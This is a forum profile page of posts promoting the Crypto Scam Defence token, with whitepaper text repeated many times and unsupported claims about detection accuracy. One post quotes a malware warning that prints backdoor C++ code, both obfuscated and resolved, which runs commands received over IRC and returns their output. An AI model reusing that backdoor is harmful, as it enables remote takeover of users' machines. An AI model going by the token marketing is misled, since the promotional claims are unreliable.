Bitcoin Forum
January 28, 2022, 03:39:22 AM *
News: Latest Bitcoin Core release: 22.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: [1]
1  Alternate cryptocurrencies / Altcoin Discussion / Re: Crypto Scam Defence will eliminate the fear of investing in fradulent projects. on: December 08, 2021, 11:43:29 AM
You'll need to have a number of tokens in your wallet in order to utilize CryptoScamDefence's Dashboard.
A holder of tokens that contributes to the network is more valuable than a holder of tokens that do not contribute to the network.

To clear some of the roadblocks to build and sustain a healthy Crypto Scam Defence community for the company-initiated project we already prepared social channels and news releases. One of the most important things that we can do to encourage involvement from people from outside of our company is to run our project using open and transparent processes, that’s why we are working to deliver the contributor development pack.

We will use a public issue tracker that contains all, and I mean all, of the bugs and features that are currently being worked on, and for our team to use pull requests and the same process as any other community member when making contributions. These bi-directional communication channels give users, contributors, and maintainers a place where everyone can get together to discuss use cases, get direct feedback on features and talk about the project, which can help build your contributor funnel to turn some users into contributors and contributions into leaders.

Join the official CSD Telegram chat: https://t.me/CryptoScamDefenceEN

The Crypto Scam Defence solution is taking into consideration the principle of open collaboration for innovation and production. We aim to build a network of contributors with revenues as a double layer of methodology and validation. Communities power everything that’s why we are open to preparing access to our development environments. Having a contributor SDK package anyone that shares our vision can get on board and develop to provide the best and powerful open solution on the market. A revenue model for crowd contributors and challenging tasks will boost CSD platform to periodically update with improvements.
2  Alternate cryptocurrencies / Altcoin Discussion / Crypto Scam Defence will eliminate the fear of investing in fradulent projects. on: December 07, 2021, 12:27:07 PM
Hey, did you ever get in contact with a cryptocurrency project that was either a rug pull, honeypot, or had any type of fraudulent activity in the smart contract?

Crypto Scam Defence(CSD) will be an important feature that you'll utilize before interacting/investing in Crypto(DeFi) projects.

Official website: https://www.crypatoscamdefence.com/

 There will be 3 layers of algorithms(more coming in the future), and a professional community voice that will be integrated into a dashboard ( usable on Desktop, Android, IOS).

With the Dashboard, you'll be able to check an individual score given by the algorithms and the community voice (0-100) that represents the risk of investing into the respective project.

Read Whitepaper (https://www.cryptoscamdefence.com/#whitepaper)

We've successfully hit the 500 telegram users milestone.
2500 more to go and we'll meet one of the requirements to be listed on CoinMarketCap and CoinGecko.

Invite your friends into this community and we'll be more than happy to answer any questions given by them.
Many thanks in advance!

Official CSD Telegram chat: https://t.me/CryptoScamDefenceEN

Languages and Coding
Linux
Nginx HTTP
MySQL
PHP
JavaScript
HTML
CSS
PHP
ReactJS
JSON
AJAX
Analytics
Matamo
Google Analytics
Campaign Monitor
Cloudflare
Data Logging
Kafka
Elasticsearch
Logstash
Kibana
Backend/API
PHP
HHVM
HAProxy
DevOps
Gitlab
CI/CD
Machine
Learning
AWS AI
Business Tools
Slack
G Suite
Asana
Jira
React Sketch.app
Server
On Premise
Docker
ELK
Cloud Solutions


Crypto Scam Components
UI/UX CSD Application Components
Structural Components – client and server sides.
FE Component - client component is a representation of a web application’s
functionality that the end-user interacts with.
BE Component - server component built using PHP with a mix of microservices
or a combination of several programming languages and frameworks, including Java,NodeJS, PHP, and Python. The server component has many parts; app logic, data storage, third parties integrations for data aggregation, microservices and machine learning instances. It’s the main control center of the web application which provides continuous access to data for the FE users and connected endpoints. This is where the data is ingested and routed to the data storage or exposed to FE.

3  Alternate cryptocurrencies / Altcoin Discussion / Crypto Scam Defence listed on Dextrade and Coinsbit, 2 more exchanges to come. on: December 01, 2021, 11:48:43 AM
CRYPTO SCAM DEFENCE (CSD) IS LISTED ON DEX-TRADE
 (https://dex-trade.com/news/csd-is-listed-on-dex-trade)Crypto Scam Defence (CSD) is listed on Dex-Trade
The following pairs are supported:
CSD/ETH
 (https://dex-trade.com/spot/trading/CSDETH)CSD/USDT

 (https://dex-trade.com/spot/trading/CSDUSDT)Official website:  https://cryptoscamdefence.com/

Facebook: https://www.facebook.com/csdfb
Twitter: https://twitter.com/DefenceScam
Telegram:  https://t.me/cryptoscamdefence
Whitepaper: https://www.cryptoscamdefence.com/the%20me-assets/images/whitepaper.pdf
Official Email Address:  hello@cryptoscamdefence.com

Benefits:
- A large number of various currency pairs, new currencies and coins are actively added to the project
- User-friendly interface with advanced charts and speed work of the project without lags, brakes, instant processing of orders, list of orders, history, and work with frames.
- Convenient, intuitive work with orders and currency pairs.
- Monitoring the status of orders
#listing #dextrade #crypto #exchange






🔥 Don't miss CSD token listing on Coinsbit! 🔥

💥 Dear users, we are glad to announce that CSD (https://www.cryptoscamdefence.com/) token will be available on Coinsbit (https://coinsbit.io/) on 01.12.2021!

🌐 Crypto Scam Defense (https://www.cryptoscamdefence.com/) is a platform for the decentralized finance industry that was created to stop the activities of scam DeFi projects. The project claims that by aggregating various technologies, Crypto Scam Defense can scan, compare with past behavior, track every transaction performed on any network.

💠 CSD (https://www.cryptoscamdefence.com/) is a token that can be used as investment protection. According to the project, using it on the Crypto Scam Defense platform, users can detect fraud and analyze any cryptocurrency.

©️ Smart-contract:
0xBa2F318b98218fb7727261DeFA99017c265BDAef

 (https://etherscan.io/token/0xBa2F318b98218fb7727261DeFA99017c265BDAef)💵 Pairs:
CSD/USDT
CSD/ETH

✅ Follow the links below to get more info:
Website
 (https://www.cryptoscamdefence.com/)Medium
 (https://medium.com/@CScamDefence)Twitter
 (https://twitter.com/DefenceScam)Reddit
 (https://www.reddit.com/r/CryptoScamDefence/)Facebook
 (https://www.facebook.com/csdfb)Telegram

 (https://t.me/CryptoScamDefenceEN)🌈 Stay tuned to get updates and latest news from Coinsbit (https://coinsbit.io/)!

#Coinsbit #Listing #CSD
4  Alternate cryptocurrencies / Altcoin Discussion / Hey, take a look at this post if you've ever interacted with DeFi scam projects. on: November 30, 2021, 07:28:59 PM
Hey, did you ever get in contact with a cryptocurrency project that was either a rug pull, honeypot, or had any type of fraudulent activity in the smart contract?

CryptoScamDefence(CSD) will be an important feature that you'll utilize before interacting/investing in Crypto(DeFi) projects.
 There will be 13 algorithms(more coming in the future), and a professional community voice that will be integrated into a dashboard ( usable on Desktop, Android, IOS).

With the Dashboard, you'll be able to check an individual score given by the algorithms and the community voice (0-100) that represents the risk of investing into the respective project.

Read Whitepaper
(https://www.cryptoscamdefence.com/#whitepaper)



Join the official CryptoScamDefence Telegram Group » https://t.me/CryptoScamDefenceEN

 One of the criteria to be listed on CoinMarketCap (https://coinmarketcap.com/) and CoinGecko (https://www.coingecko.com/) is to have 3k Telegram users in our main group.
We need 2540 more members and we'll be successfully integrated on those 2 platforms.

A project’s usefulness is largely a function of adoption and its ability to foster meaningful interactions with its community and user base. 
Let's build a strong community, together
!
5  Alternate cryptocurrencies / Tokens (Altcoins) / CryptoScamDefence will put a stop to STOP RUGPULLS & HONEYPOTS SCAMS on: November 26, 2021, 11:45:26 AM
In simple terms, CSD token is a blockchain-based asset that people buy for gaining access to cryptoscamdefence.com users dashboard to use features that helps them get 13 Crypto Scam Defence instant reports and analytics for other cryptos. With that said, based on the current stage of development and the roadmap exposed, having CSD on your assets will give you endless access to take the right decisions before investing in any other crypto asset. Consider CSD as your safeguard against any potential fraud model and your buddy “consultant” when investing in any new crypto.
[/b]

Our business model is focused on helping many people around the world not get scammed by fraudulent projects.

For more information, visit the official website at https://www.cryptoscamdefence.com/.
Watch out for CSD News https://t.me/CSD_News



Check more information on the official white paper.
https://www.cryptoscamdefence.com/theme-assets/images/whitepaper.pdf


Our highly motivated professional team found ways that make things work differently. Aggregating various technologies we can scan, compare with past behaviors, track down each transaction made on any network, those based on the following layers:
[/size]
1. The algorithm-based  that's extracting data from various blockchains (ETHScan, BSCscan, TRX, ChainLink, and so on)

2. This layer consists of experts + the community's organic opinion.

3. Machine learning that's taking into consideration various past different stimuli gathered from data sources.


Telegram Regional Groups
[/size]

🇺🇸 https://t.me/CryptoScamDefenceEN
🇷🇴https://t.me/CryptoScamDefenceRO
🇨🇳https://t.me/CSD_Chinese
🇩🇪https://t.me/CSD_German
🇮🇩https://t.me/CSD_Indonesian
🇻🇳 https://t.me/CSD_Vietnamese
🇪🇸https://t.me/CSD_Spanish
🇮🇹 https://t.me/CSD_Italian
🇵🇭 https://t.me/CSD_Philippines
🇯🇵https://t.me/joinchat/z4nms22SUz0wZmJk - Japanese
🇷🇺https://t.me/CSD_Russian
🇹🇷https://t.me/CSD_Turkish





When analyzing other cryptos the automated scoring mechanism based on well-defined algorithms and machine learning behavior comparison plus instant reports of tracked transactions and the second layer of human experts interactions will serve you a powerful CSD utility described in the Token Utility chapter. Even if the experts' prediction for the CSD is that it will rapidly gain popularity, we prefer to be neutral and focus on our scope to be your best buddy consultant that will assist you each step of the way to DeFi revolution and one step closer to money revolution with minimized risks of being scammed.



In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time.
 This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too?

DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.



As mentioned in the introduction part, our business model is focused on helping many people from all over the globe to not be tricked by fraudulent projects that can leave them with permanent material loss. The biggest risk that DeFi investors need to worry about is losing all the money but this isn't the only thing they should be worried about. As described above in the chapter Introducing Crypto Scam Defence Solution to DeFi Scams Problem our focus is to gather 10 Crypto Scam Defence information and use data to develop new algorithms in order to identify fraudulent behaviour models.

Our highly experienced team developers and blockchain experts advisers came with a stack of technologies that can make it possible to instantly analyze and score any active smart contract. At the time of writing this, we gathered enough past data and we started to build models of behaviours.


Technologies & Solution Architecture
[/color]

What is a Tech Stack?
A tech stack refers to a set of tools, programming languages, and technologies that work together to build digital products or solutions such as Crypto Scam Defence solutions. A tech stack consists of two equally important elements: the frontend (client-side) and backend (server-side). Both work together to create a working tech stack.



Project Architecture

Crypto Scam Defence architecture diagram with the interactions between applications, microservices, databases, blockchain data aggregator, machine learning instances, third parties API integrations and web users.


Crypto Scam Components
UI/UX CSD Application Components
Structural Components – client and server sides.
FE Component - client component is a representation of a web application’s
functionality that the end-user interacts with.
BE Component - server component built using PHP with a mix of microservices
or a combination of several programming languages and frameworks, including Java, NodeJS, PHP, and Python.

The server component has many parts: app logic, data storage, third parties integrations for data aggregation, microservices and machine learning instances. It’s the main control centre of the web application which provides continuous access to data for the FE users and connected endpoints. This is where the data is ingested and routed to the data storage or exposed to FE.



Token utility use Cases


Simplified trading

In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too? DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.


Automatic scoring mechanism


The auto-scoring mechanism functionality is developed to analyze the various crypto smart contracts, transactions, holders, wallets, and behavior comparisons to give them a score based on well-defined criteria from blockchain experts. We cannot predict asset values on the market and it’s not in our scope of work but we can give you a score to help you make investment decisions. The experimental proof of concept results showed us a high correlation between the scores of the auto-scoring mechanism and the manual scoring. The second layer of human expert crowdsource will add a more precise score.


Rug pull and scam detection


Based on the blockchain enterprise subscription plans we have access to their professional API endpoints to fetch any smart contract data including pending transactions so we can easily instantly detect any movements of funds. As described in previous chapters, our detection mechanism once detected can send notifications To CSD Token holder when specific events trigger the mechanism.



Smart contracts monitoring

Related to the same mechanism, different techniques can be applied with defined patterns to continuously monitor such data in the blockchain.


Address monitor

The same principle can be applied also on user-defined “watchers” to keep an eye on Wallet addresses added into monitor service as a custom job with custom criteria.


Transactions track down

In our early stage when tests have been made as described in the proof of concept chapter we succeeded with no doubt not only to track down transactions but also we
detected blockchain shifts and came back to the original owner including associating transactions with fraud projects and repetitive transactions with other addresses related to the same practices.



Blockchain shift detection

As described above we are able to track down transactions outside of the blockchain boundaries so we can keep track not only in the current network. Following these criteria, if we identify abnormal activity or we link one address to fraud in one network, we already have a bad score applied to the address in the other end. The chances of not being accurate are pretty low.


Behaviour comparison

Starting from the moment when machine learning is getting outside of the testing lab stage as described in the proof of concept chapter, once into the production environment will add a layer of behavior comparison with past projects using AWS AI scalable instances and save data into our data storage for instant future reports.


User defined instant notifications

At the cost notification service providers, any CSD Token holder can spend part of their CSD into being notified when specific events trigger defined criteria. CSD Tokens spent on special services like this one will be transferred to the team wallet for operational costs and further improvements of cryptoscamdefence.com.


Smart contracts whitelisting/blacklisting

Terms such as “blacklist” and “whitelist” were commonly used within cybersecurity and infosec circles to simply designate what person or application can access a system or network (and which ones were denied). Our scoring mechanism once filled with the qualified confirmed result against the detected smart contract scam project will automatically blacklist in our data storage and flag it as a highly risky investment with the option for the contract owner to be whitelisted back once it will pass all stages of the validation process where also the community it is involved.
 On top of this validation process being whitelisted by CryptoScamDefence gives contracts the badge of trust verified by cyptoscamdefence.com and community experts. Our scope of work is not only acting as arbitrage middleware but also based on our team experts together with CSD community voice and certified experts will provide enterprise-level audits to support newly created projects to get popular and trusted by the community and potential investors






More features to come

Crypto Scam Defence business model needs continuous improvement and focus on the community voice. Incremental changes into product feature it’s already on the checklist as continuous upgrades and implementation of any solid new features. Constant feedback from the community is an important aspect of the continuous improvement model. Open communication during every phase of executing an improvement is critical to both the final results of the improvement and to the maintenance and project managing costs. Making continuous improvement part of company culture is an excellent and cost-effective approach to tackling an organization’s most difficult challenges. When supported by improvement technology, results can be achieved quickly and success can be sustained over time.
6  Alternate cryptocurrencies / Altcoin Discussion / Re: Crypto Scam Defence - STOP DEFI SCAMS on: November 24, 2021, 10:46:56 AM
Besides just using it for gaining access to the dashboard, how exactly is the token going to help with stopping DeFi scams?

In simple terms, Crypto Scam Defence Token is a blockchain-based asset that people buy in order to meet the requirement of
Our highly motivated professional team found ways that make things work differently. Aggregating various technologies we can scan, compare with past behaviors, track down each transaction made on any network, those based on the following layers:

1. The algorithm based  that's extracting data from various blockchains (ETHScan, BSCscan, TRX, ChainLink, and so on)
I wonder how your algos will work on determining which coin is scam and which one is not. I mean some scenarios where there is an exit scam planned. it's hard to know how it will be pulled off or when it will be abandoned since most scammers are now aware that people know of the old rug pulling and honeypot techniques.




When analyzing other cryptos the automated scoring mechanism based on well-defined algorithms and machine learning behavior comparison plus instant reports of tracked transactions and the second layer of human experts interactions will serve you a powerful CSD utility described in the Token Utility chapter. Even if the experts' prediction for the CSD is that it will rapidly gain popularity, we prefer to be neutral and focus on our scope to be your best buddy consultant that will assist you each step of the way to DeFi revolution and one step closer to money revolution with minimized risks of being scammed.



Our highly experienced team developers and blockchain experts advisers came with a stack of technologies that can make it possible to instantly analyze and score any active smart contract. At the time of writing this, we gathered enough past data and we started to build models of behaviours.


Technologies & Solution Architecture

What is a Tech Stack?

A tech stack refers to a set of tools, programming languages, and technologies that work together to build digital products or solutions such as Crypto Scam Defence solutions. A tech stack consists of two equally important elements: the frontend (client-side) and backend (server-side). Both work together to create a working tech stack.

Check more information in the following Imgur link -

Project Architecture

Crypto Scam Defence architecture diagram with the interactions between applications, microservices, databases, blockchain data aggregator, machine learning instances, third parties API integrations and web users.


Crypto Scam Components
UI/UX CSD Application Components
Structural Components – client and server sides.
FE Component - client component is a representation of a web application’s
functionality that the end-user interacts with.
BE Component - server component built using PHP with a mix of microservices
or a combination of several programming languages and frameworks, including Java, NodeJS, PHP, and Python.

The server component has many parts: app logic,
data storage, third parties integrations for data aggregation, microservices and machine learning instances. It’s the main control centre of the web application which provides continuous access to data for the FE users and connected endpoints. This is where the data is ingested and routed to the data storage or exposed to FE.



Token utility use Cases


Simplified trading


In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too? DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.


Automatic scoring mechanism



The auto-scoring mechanism functionality is developed to analyze the various crypto smart contracts, transactions, holders, wallets, and behavior comparisons to give them a score based on well-defined criteria from blockchain experts. We cannot predict asset values on the market and it’s not in our scope of work but we can give you a score to help you make investment decisions. The experimental proof of concept results showed us a high correlation between the scores of the auto-scoring mechanism and the manual scoring. The second layer of human expert crowdsource will add a more precise score.


Rug pull and scam detection



Based on the blockchain enterprise subscription plans we have access to their professional API endpoints to fetch any smart contract data including pending transactions so we can easily instantly detect any movements of funds. As described in previous chapters, our detection mechanism once detected can send notifications To CSD Token holder when specific events trigger the mechanism.



Smart contracts monitoring

Related to the same mechanism, different techniques can be applied with defined patterns to continuously monitor such data in the blockchain.


Address monitor

The same principle can be applied also on user-defined “watchers” to keep an eye on Wallet addresses added into monitor service as a custom job with custom criteria.


Transactions track down



In our early stage when tests have been made as described in the proof of concept chapter we succeeded with no doubt not only to track down transactions but also we
detected blockchain shifts and came back to the original owner including associating transactions with fraud projects and repetitive transactions with other addresses related to the same practices.




Blockchain shift detection


As described above we are able to track down transactions outside of the blockchain boundaries so we can keep track not only in the current network. Following these criteria, if we identify abnormal activity or we link one address to fraud in one network, we already have a bad score applied to the address in the other end. The chances of not being accurate are pretty low.

Behaviour comparison

Starting from the moment when machine learning is getting outside of the testing lab stage as described in the proof of concept chapter, once into the production environment will add a layer of behavior comparison with past projects using AWS AI scalable instances and save data into our data storage for instant future reports.

User defined instant notifications

At the cost notification service providers, any CSD Token holder can spend part of their CSD into being notified when specific events trigger defined criteria. CSD Tokens spent on special services like this one will be transferred to the team wallet for operational costs and further improvements of cryptoscamdefence.com.

Smart contracts whitelisting/blacklisting

Terms such as “blacklist” and “whitelist” were commonly used within cybersecurity and infosec circles to simply designate what person or application can access a system or network (and which ones were denied). Our scoring mechanism once filled with the qualified confirmed result against the detected smart contract scam project will automatically blacklist in our data storage and flag it as a highly risky investment with the option for the contract owner to be whitelisted back once it will pass all stages of the validation process where also the community it is involved.
 On top of this validation process being whitelisted by CryptoScamDefence gives contracts the badge of trust verified by cyptoscamdefence.com and community experts. Our scope of work is not only acting as arbitrage middleware but also based on our team experts together with CSD community voice and certified experts will provide enterprise-level audits to support newly created projects to get popular and trusted by the community and potential investors






More features to come

Crypto Scam Defence business model needs continuous improvement and focus on the community voice. Incremental changes into product feature it’s already on the checklist as continuous upgrades and implementation of any solid new features. Constant feedback from the community is an important aspect of the continuous improvement model. Open communication during every phase of executing an improvement is critical to both the final results of the improvement and to the maintenance and project managing costs. Making continuous improvement part of company culture is an excellent and cost-effective approach to tackling an organization’s most difficult challenges. When supported by improvement technology, results can be achieved quickly and success can be sustained over time.





In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time.
 This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too?

DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.



As mentioned in the introduction part, our business model is focused on helping many people from all over the globe to not be tricked by fraudulent projects that can leave them with permanent material loss. The biggest risk that DeFi investors need to worry about is losing all the money but this isn't the only thing they should be worried about. As described above in the chapter Introducing Crypto Scam Defence Solution to DeFi Scams Problem our focus is to gather 10 Crypto Scam Defence information and use data to develop new algorithms in order to identify fraudulent behaviour models.
7  Alternate cryptocurrencies / Altcoin Discussion / Re: Crypto Scam Defence - STOP DEFI SCAMS on: November 23, 2021, 12:35:40 PM
How does the system determine if a project is a scam or not? Even projects that have been audited and have a doxxed team can do scams, so far as I know there are some projects that only check smart contracts which can indicate a rug pul or not.
Rugpull is most likely to happen into those coins which had been not been locked and thats why you should really be keen on finding these various informations when you do tend to make investment.

Scams are everywhere and most of them cant really be noticed even how experienced or veteran you are yet everything could really be looks real yet scammers are getting smarter as we do go ahead.
As an investor then you should be wise and do your own research and wont really be tending out to make out careless decisions.
The purpose of this document is to make you understand the problem we are facing now with the growing popularity of the crypto markets. Cryptocurrencies and blockchain are a monstrosus topic and the applications of blockchain technologies came with a total lack of regulations in order to prevent illegal activities. Since the legal context is missing in Decentralized Finance built on top of blockchain technology, we are forced to be witnesses of DeFi rising scams.

DeFi rug pulls and exit scams formed 99% of all crypto frauds in 2020. DeFi-related hacks now make up more than 60% of the total hack and theft
volume in 2021, a large increase from only 25% in 2020.

Both exit scams and DeFi rug pulls are crypto frauds. Exit scams happen when cryptocurrency promoters disappear with investors' money during or after an initial coin offering (ICO). DeFi rug pulls are a new form of exit scam whereby crypto developers abandon a project and run away with investors' funds.

At the time of writing, between January-April 2021, DeFi scamsters raked in almost $83.4 million. Looking at the broader picture, almost 55% of all major cryptocurrency scams were DeFi hacks. That means out of a total theft amount of $432 million, $240 million can solely be attributed to DeFi. Even sophisticated investors, with a keen eye and understanding of financial details, can fall prey to such scams.




We built a platform for the decentralized finance industry to STOP the explosion of DeFi fraudulent projects that has left many individual investors burned. In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too?





8  Alternate cryptocurrencies / Altcoin Discussion / Re: Beware of Increasingly Sophisticated Malware Infection Attempts on: November 23, 2021, 12:32:55 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.




The purpose of this document is to make you understand the problem we are facing now with the growing popularity of the crypto markets. Cryptocurrencies and blockchain are a monstrosus topic and the applications of blockchain technologies came with a total lack of regulations in order to prevent illegal activities. Since the legal context is missing in Decentralized Finance built on top of blockchain technology, we are forced to be witnesses of DeFi rising scams.

DeFi rug pulls and exit scams formed 99% of all crypto frauds in 2020. DeFi-related hacks now make up more than 60% of the total hack and theft
volume in 2021, a large increase from only 25% in 2020.

Both exit scams and DeFi rug pulls are crypto frauds. Exit scams happen when cryptocurrency promoters disappear with investors' money during or after an initial coin offering (ICO). DeFi rug pulls are a new form of exit scam whereby crypto developers abandon a project and run away with investors' funds.

At the time of writing, between January-April 2021, DeFi scamsters raked in almost $83.4 million. Looking at the broader picture, almost 55% of all major cryptocurrency scams were DeFi hacks. That means out of a total theft amount of $432 million, $240 million can solely be attributed to DeFi. Even sophisticated investors, with a keen eye and understanding of financial details, can fall prey to such scams.




We built a platform for the decentralized finance industry to STOP the explosion of DeFi fraudulent projects that has left many individual investors burned. In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too?







Token utility use Cases
[/color]


Simplified trading


In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too? DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.


Automatic scoring mechanism



The auto-scoring mechanism functionality is developed to analyze the various crypto smart contracts, transactions, holders, wallets, and behavior comparisons to give them a score based on well-defined criteria from blockchain experts. We cannot predict asset values on the market and it’s not in our scope of work but we can give you a score to help you make investment decisions. The experimental proof of concept results showed us a high correlation between the scores of the auto-scoring mechanism and the manual scoring. The second layer of human expert crowdsource will add a more precise score.


Rug pull and scam detection



Based on the blockchain enterprise subscription plans we have access to their professional API endpoints to fetch any smart contract data including pending transactions so we can easily instantly detect any movements of funds. As described in previous chapters, our detection mechanism once detected can send notifications To CSD Token holder when specific events trigger the mechanism.



Smart contracts monitoring

Related to the same mechanism, different techniques can be applied with defined patterns to continuously monitor such data in the blockchain.


Address monitor

The same principle can be applied also on user-defined “watchers” to keep an eye on Wallet addresses added into monitor service as a custom job with custom criteria.


Transactions track down

In our early stage when tests have been made as described in the proof of concept chapter we succeeded with no doubt not only to track down transactions but also we
detected blockchain shifts and came back to the original owner including associating transactions with fraud projects and repetitive transactions with other addresses related to the same practices.




Blockchain shift detection


As described above we are able to track down transactions outside of the blockchain boundaries so we can keep track not only in the current network. Following these criteria, if we identify abnormal activity or we link one address to fraud in one network, we already have a bad score applied to the address in the other end. The chances of not being accurate are pretty low.

Behaviour comparison

Starting from the moment when machine learning is getting outside of the testing lab stage as described in the proof of concept chapter, once into the production environment will add a layer of behavior comparison with past projects using AWS AI scalable instances and save data into our data storage for instant future reports.

User defined instant notifications

At the cost notification service providers, any CSD Token holder can spend part of their CSD into being notified when specific events trigger defined criteria. CSD Tokens spent on special services like this one will be transferred to the team wallet for operational costs and further improvements of cryptoscamdefence.com.

Smart contracts whitelisting/blacklisting

Terms such as “blacklist” and “whitelist” were commonly used within cybersecurity and infosec circles to simply designate what person or application can access a system or network (and which ones were denied). Our scoring mechanism once filled with the qualified confirmed result against the detected smart contract scam project will automatically blacklist in our data storage and flag it as a highly risky investment with the option for the contract owner to be whitelisted back once it will pass all stages of the validation process where also the community it is involved.
 On top of this validation process being whitelisted by CryptoScamDefence gives contracts the badge of trust verified by cyptoscamdefence.com and community experts. Our scope of work is not only acting as arbitrage middleware but also based on our team experts together with CSD community voice and certified experts will provide enterprise-level audits to support newly created projects to get popular and trusted by the community and potential investors






More features to come

Crypto Scam Defence business model needs continuous improvement and focus on the community voice. Incremental changes into product feature it’s already on the checklist as continuous upgrades and implementation of any solid new features. Constant feedback from the community is an important aspect of the continuous improvement model. Open communication during every phase of executing an improvement is critical to both the final results of the improvement and to the maintenance and project managing costs. Making continuous improvement part of company culture is an excellent and cost-effective approach to tackling an organization’s most difficult challenges. When supported by improvement technology, results can be achieved quickly and success can be sustained over time.
9  Alternate cryptocurrencies / Altcoin Discussion / Re: Crypto Scam Defence - STOP DEFI SCAMS on: November 23, 2021, 12:30:28 PM
Similiar IDEA with other past projects

From my perspective is wasting of time, and how the algorithm is gonna safe people by scanning on various chains? I don't think based on the few feature you mention is really gonna work.



Token utility use Cases


Simplified trading


In the current DeFi marketplace, though, managing your portfolio still requires daily diligence, and that can take up a lot of time. This raises the question: Is there a way to benefit from DeFi without giving away all your time, and potentially all your money, too? DeFi may be difficult, but making money from it doesn’t have to be. By aggregating various technologies we make it possible! Your CSD Token acts as a safeguard for your investments.


Automatic scoring mechanism



The auto-scoring mechanism functionality is developed to analyze the various crypto smart contracts, transactions, holders, wallets, and behavior comparisons to give them a score based on well-defined criteria from blockchain experts. We cannot predict asset values on the market and it’s not in our scope of work but we can give you a score to help you make investment decisions. The experimental proof of concept results showed us a high correlation between the scores of the auto-scoring mechanism and the manual scoring. The second layer of human expert crowdsource will add a more precise score.


Rug pull and scam detection



Based on the blockchain enterprise subscription plans we have access to their professional API endpoints to fetch any smart contract data including pending transactions so we can easily instantly detect any movements of funds. As described in previous chapters, our detection mechanism once detected can send notifications To CSD Token holder when specific events trigger the mechanism.



Smart contracts monitoring

Related to the same mechanism, different techniques can be applied with defined patterns to continuously monitor such data in the blockchain.


Address monitor

The same principle can be applied also on user-defined “watchers” to keep an eye on Wallet addresses added into monitor service as a custom job with custom criteria.


Transactions track down

In our early stage when tests have been made as described in the proof of concept chapter we succeeded with no doubt not only to track down transactions but also we
detected blockchain shifts and came back to the original owner including associating transactions with fraud projects and repetitive transactions with other addresses related to the same practices.




Blockchain shift detection


As described above we are able to track down transactions outside of the blockchain boundaries so we can keep track not only in the current network. Following these criteria, if we identify abnormal activity or we link one address to fraud in one network, we already have a bad score applied to the address in the other end. The chances of not being accurate are pretty low.

Behaviour comparison

Starting from the moment when machine learning is getting outside of the testing lab stage as described in the proof of concept chapter, once into the production environment will add a layer of behavior comparison with past projects using AWS AI scalable instances and save data into our data storage for instant future reports.

User defined instant notifications

At the cost notification service providers, any CSD Token holder can spend part of their CSD into being notified when specific events trigger defined criteria. CSD Tokens spent on special services like this one will be transferred to the team wallet for operational costs and further improvements of cryptoscamdefence.com.

Smart contracts whitelisting/blacklisting

